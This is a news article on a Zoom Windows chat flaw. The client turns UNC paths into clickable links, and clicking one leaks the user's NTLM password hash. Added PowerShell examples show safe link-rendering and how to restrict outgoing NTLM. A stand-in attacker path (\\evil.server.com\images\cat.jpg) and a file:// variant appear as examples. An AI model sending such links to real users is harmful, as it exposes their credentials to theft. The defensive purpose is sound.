Zoom use has been exploding during the COVID-19 crisis as an increasing number of people work from home. But as more people flock to the video conferencing service for business meetings or chats, security and privacy issues are quickly emerging.
Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.
When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.
But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.
Ok, so what’s the problem?
Bleeping Computer demonstrated how a regular URL and the UNC path \\evil.server.com\images\cat.jpg were both converted into clickable links in the chat message.
The problem with this, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.” As part of that SMB connection, Windows by default sends the user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.
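The root cause described above is a chat client that turns anything resembling a path into a link. The defensive fix on the application side is an allow-list: only absolute http/https URLs become clickable, and everything else (including a `\\host\share` UNC path) stays plain text. The following is an added example written for this page, not Zoom's code; the function name `ConvertTo-SafeChatHtml` and the sample messages are my own.

```powershell
# Added example (not Zoom's code): render a chat message as HTML, linkifying
# only http/https URLs. UNC paths such as \\host\share never match the
# allow-list, so clicking the text can never start an SMB connection.
function ConvertTo-SafeChatHtml {
    param([Parameter(Mandatory)][string]$Message)

    # HTML-encode first so the message body itself cannot inject markup.
    $encoded = [System.Net.WebUtility]::HtmlEncode($Message)

    # Allow-list pattern: an absolute URL that starts with http:// or https://.
    # Backslashes are excluded from the URL body, and no other scheme
    # (file:, smb:, bare \\server\share) can satisfy the prefix.
    $pattern = '(?i)\bhttps?://[^\s<>"''\\]+'

    return [regex]::Replace($encoded, $pattern, {
        param($m)
        $url = $m.Value
        # Second check with the URI parser so look-alikes are still rejected.
        $uri = $null
        $ok  = [System.Uri]::TryCreate($url, [System.UriKind]::Absolute, [ref]$uri)
        if ($ok -and ($uri.Scheme -eq 'http' -or $uri.Scheme -eq 'https')) {
            return "<a href=`"$url`">$url</a>"
        }
        return $url
    })
}

# Constructed sample messages: the UNC path from the article and an ordinary URL.
$samples = @(
    'Look at this: \\evil.server.com\images\cat.jpg',
    'Docs are at https://example.com/guide?x=1&y=2',
    'Mixed: file://evil.server.com/share/cat.jpg and http://example.com'
)
foreach ($s in $samples) {
    Write-Output ("IN : " + $s)
    Write-Output ("OUT: " + (ConvertTo-SafeChatHtml -Message $s))
    Write-Output ''
}
```

Running it shows the UNC path and the `file://` form emitted as inert text while only the `http`/`https` URLs gain an `<a>` tag. An allow-list is the right shape here because a deny-list of `\\` alone would still let other Windows-handled schemes through; listing what is permitted closes that whole class.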
Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.
Zoom told me that “ensuring the privacy and security of our users and their data is paramount.”
A spokesperson added: “We are aware of the UNC issue and are working to address it.”
What to do, until Zoom issues a fix
The issue needs to be fixed by Zoom, but until then you can enable a group policy that prevents NTLM credentials from automatically being sent as described above. You can find the setting in the Group Policy Editor and change it to “Deny All.”
Go to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers.
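The Group Policy setting above is backed by a single registry value, which is convenient for checking or rolling it out with a script. The block below is an added example and not part of the article: it reads the current state, can switch between Allow/Audit/Deny, and lists the NTLM operational-log events that Audit mode produces, so you can see which legitimate servers would break before moving to Deny All. The function names are my own; the registry path, value name and the 0/1/2 meanings are the documented ones for this policy.

```powershell
# Added example (not from the article). Run in an elevated PowerShell session.
# In a domain, make the change through Group Policy instead: a GPO refresh
# will overwrite a locally written value.
$LsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$ValueName = 'RestrictSendingNTLMTraffic'   # 0 = Allow all, 1 = Audit all, 2 = Deny all
$Modes     = @{ AllowAll = 0; AuditAll = 1; DenyAll = 2 }

function Get-OutgoingNtlmPolicy {
    # Returns the current mode of "Restrict NTLM: Outgoing NTLM traffic to remote servers".
    $item = Get-ItemProperty -Path $LsaKey -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'NotConfigured (behaves as AllowAll)' }
    switch ($item.$ValueName) {
        0 { 'AllowAll' }
        1 { 'AuditAll' }
        2 { 'DenyAll' }
        default { "Unknown ($_)" }
    }
}

function Set-OutgoingNtlmPolicy {
    param(
        [Parameter(Mandatory)][ValidateSet('AllowAll', 'AuditAll', 'DenyAll')][string]$Mode,
        # Servers that may still receive NTLM under DenyAll, e.g. a file server
        # that cannot do Kerberos. Maps to "Add remote server exceptions".
        [string[]]$AllowedServers = @()
    )
    if (-not (Test-Path $LsaKey)) { New-Item -Path $LsaKey -Force | Out-Null }
    Set-ItemProperty -Path $LsaKey -Name $ValueName -Value $Modes[$Mode] -Type DWord
    if ($AllowedServers.Count -gt 0) {
        Set-ItemProperty -Path $LsaKey -Name 'ClientAllowedNTLMServers' `
            -Value $AllowedServers -Type MultiString
    }
}

function Get-AuditedOutgoingNtlm {
    # Under AuditAll, event 8001 in the NTLM operational log records each
    # outgoing NTLM authentication that DenyAll would have blocked.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
        -MaxEvents 50 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

# Suggested sequence: look, audit for a while, review, then deny.
Get-OutgoingNtlmPolicy
# Set-OutgoingNtlmPolicy -Mode AuditAll
# Get-AuditedOutgoingNtlm
# Set-OutgoingNtlmPolicy -Mode DenyAll -AllowedServers 'fileserver.corp.example'
```

The caveat a practitioner wants: “Deny All” stops NTLM to every remote server, including legitimate shares on NAS boxes or workgroup machines that cannot fall back to Kerberos, so the Audit step and the exception list are what make the setting deployable rather than merely strict.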
Numerous Zoom problems
It comes as numerous Zoom privacy problems emerge, alongside a surge in so-called “Zoom bombers” and news that the app is not end-to-end encrypted.
Ian Thornton-Trump, chief security officer at Cyjax, says that as more people use the video conferencing app amid the COVID-19 crisis, security problems are going to be a growing pain for Zoom. “I think the success story for them is they were able to scale to meet demand and they have been responsive to fixing issues–once they have been identified–quickly. The good news story is Zoom is battle tested and it will be a great solution and a global standard in the months to come.”
But for now security and privacy issues persist, and it’s left many people looking for an alternative. Security researcher Sean Wright says he could not recommend Zoom for sensitive calls and conversations. “Hopefully Zoom will take a long hard look and address this issue as well as putting in the effort to ensure that its product is secure.”
Wright recommends using a service such as Signal for private calls and I have to agree.
But Signal isn’t great for larger groups, so you might want to stick to something like Microsoft Teams if you are a business, while FaceTime could work for all types of users–as long as you have access to an Apple device.
O’Flaherty, Kate. “Zoom User Warning: This is How Hackers Can Steal Windows Passwords.” Forbes.com, April 1, 2020.